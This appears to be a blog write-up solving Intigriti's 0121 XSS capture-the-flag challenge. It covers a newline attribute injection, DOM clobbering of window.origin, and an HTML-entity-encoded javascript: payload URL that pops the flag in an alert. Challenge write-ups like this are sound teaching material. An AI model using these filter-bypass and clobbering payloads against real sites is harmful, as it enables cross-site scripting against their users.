Solution for Intigriti’s 0121 challenge

Time to investigate

Let’s dig into the source code to figure out what’s going on! The page loads the script script.js (you can find the whole script at the bottom of the post)

  1. Loop through the two strings ‘document’ and ‘window’
  2. Loop through all the properties for the objects ‘document’ and ‘window’
  3. Check if the property is of type ‘string’
  4. If it is, check if it contains the substring ‘javascript’
  5. If it does, delete the property
https://challenge-0121.intigriti.io/?r=https://example.com

Try harder

The weird filtering functionality seems interesting so let’s take a closer look at that. Which properties of document and window are even available and of type ‘string’? Let’s just quickly modify the code a bit to list them all for us. Something like this will work:

Try harder I said - Or just be lucky

After doing some thorough cool hacking analysis - or maybe just spraying some random payloads at the page - I got something interesting:

https://challenge-0121.intigriti.io/?r=bla%0ahihi

Wrapping it together - DOM clobbering FTW

So now we can set arbitrary attributes for an anchor tag and have discovered how to remove the origin property. Could we maybe chain these discoveries together? Of course, we can! What would happen if we set an id attribute to the anchor tag with the value origin while we use the subdomain https://javascript.challenge-0121.intigriti.io to have the origin property deleted? The answer is magic. Or maybe just DOM clobbering… Yeah, it’s definitely just DOM clobbering. Let’s try something like https://javascript.challenge-0121.intigriti.io/?r=bla%0aid=origin :

https://javascript.challenge-0121.intigriti.io/?r=bla%0aid=origin

Payload time

Now we’re finally ready to craft our final payload and pop the alert box!

https://javascript.challenge-0121.intigriti.io/?r=j%26%23x41;vascript:alert(flag.innerText);//%0aid=origin
  1. https://javascript.challenge-0121.intigriti.io/
    Use the ‘javascript’ subdomain to delete window.origin
  2. ?r=j%26%23x41;vascript:
    Use encoding to bypass the filter
  3. alert(flag.innerText);//
    Alert the flag
  4. %0aid=origin
    Set the id of the anchor tag to origin to clobber window.origin
  1. You may have noticed that display will eventually be set to block, but this will only happen 1 second after the 5 second delay for the redirect. This means that if our browser redirects us to the target location in less than a second, we won’t ever see the change.
  2. If you didn’t catch my thick sarcastic tone, let me be clear: I discovered this by coincidence. But that’s totally ok. That can be part of the process when doing challenges and even bug bounty hunting.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store